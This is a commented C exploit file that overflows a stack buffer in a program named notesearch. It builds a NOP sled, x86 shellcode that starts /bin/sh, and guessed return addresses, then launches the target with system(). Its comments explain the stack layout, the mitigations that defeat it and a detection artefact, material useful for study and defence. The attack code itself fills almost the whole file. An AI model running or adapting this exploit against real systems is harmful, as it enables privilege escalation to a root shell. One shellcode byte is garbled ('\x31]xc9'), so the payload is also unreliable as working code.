path: root/exploit_notesearch.c
blob: 815ea11a6daaa0e47cd86bd73132733c79565378 (plain)

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
/*
 * Opaque machine-code payload kept as a byte string; main() copies it into
 * the argument it builds for ./notesearch.
 *
 * Recognisable markers for anyone triaging this sample: \xcd\x80 is the
 * x86 `int 0x80` instruction (the 32-bit Linux system-call gate), and
 * \x2f\x2f\x73\x68 and \x2f\x62\x69\x6e are the ASCII bytes for "//sh" and
 * "/bin".  That points to a 32-bit Linux payload meant to start a shell;
 * the rest of the bytes are not decoded here.
 *
 * The array is a writable global with external linkage.  The string
 * literal adds a terminating NUL, which main() leaves out by copying
 * sizeof(shellcode) - 1 bytes.
 */
char shellcode[]=
"\x31\xc0\x31\xdb\x31]xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
"\x2f\x2f\x73\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
"\xe1\xcd\x80";

/*
 * Builds a shell command line of the form  ./notesearch '<crafted argument>'
 * and runs it with system().  The crafted argument is at most 160 bytes:
 * 60 bytes of 0x90, then the shellcode bytes, then repeated copies of a
 * guessed stack address.
 *
 * argv[1], when present, replaces the default offset of 270 that is
 * subtracted from the address of a local variable to form that guess.
 *
 * NOTE(review): notesearch itself is not in this file; presumably it copies
 * its argument into a fixed-size stack buffer without a length check --
 * confirm against its source.  The address guess only holds when this
 * process and the target have near-identical stack addresses, and the
 * payload only runs if the stack is executable, so address-space
 * randomisation, a non-executable stack and stack canaries in the target
 * each break a different part of this layout.
 *
 * For detection: the observable artefact is a process argument holding a
 * long run of 0x90 followed by non-printable bytes, passed through sh -c.
 *
 * Always returns 0; the status returned by system() is discarded.
 */
int main(int argc, const char *argv[])
{
  /* i is both the loop counter and the stack reference point whose address
   * seeds ret; ptr is declared but never used. */
  unsigned int i, *ptr, offset=270;
  unsigned long ret;
  char *command, *buffer;

  /* NOTE(review): the malloc result is used without a NULL check, and
   * bzero() is declared in <strings.h>, which this file does not include. */
  command = (char *) malloc(200);
  bzero(command, 200);

  /* 14-byte prefix: program name, a space and the opening single quote. */
  strcpy(command, "./notesearch \'");
  /* buffer marks where the quoted argument starts inside command. */
  buffer = command + strlen(command);

  /* atoi() reports no errors; a negative value wraps when stored in the
   * unsigned offset. */
  if(argc > 1)
    offset = atoi(argv[1]);

  /* The cast applies to &i before the subtraction, so this is plain
   * integer arithmetic on the address of the local, not pointer math. */
  ret = (unsigned long) &i - offset;

  /* Fill the argument area with copies of ret.  The last store ends no
   * later than buffer + 160, i.e. 174 bytes into the 200-byte allocation.
   * buffer is command + 14, so these stores are not aligned for
   * unsigned long: tolerated on x86, undefined by the C standard. */
  for (i = 0; i < 160; i += 8) {
    *((unsigned long *)(buffer + i)) = ret;
  }

  /* Overwrite the first 60 bytes with 0x90 (the x86 one-byte NOP), then
   * place the payload right after it; sizeof - 1 drops the literal's NUL. */
  memset(buffer, 0x90, 60);
  memcpy(buffer+60, shellcode, sizeof(shellcode) - 1);

  /* strcat() appends the closing quote at the first NUL byte in command. */
  strcat(command, "\'");

  /* system() hands the whole string to the shell; its return value is
   * ignored. */
  system(command);
  free(command);
  return 0;
}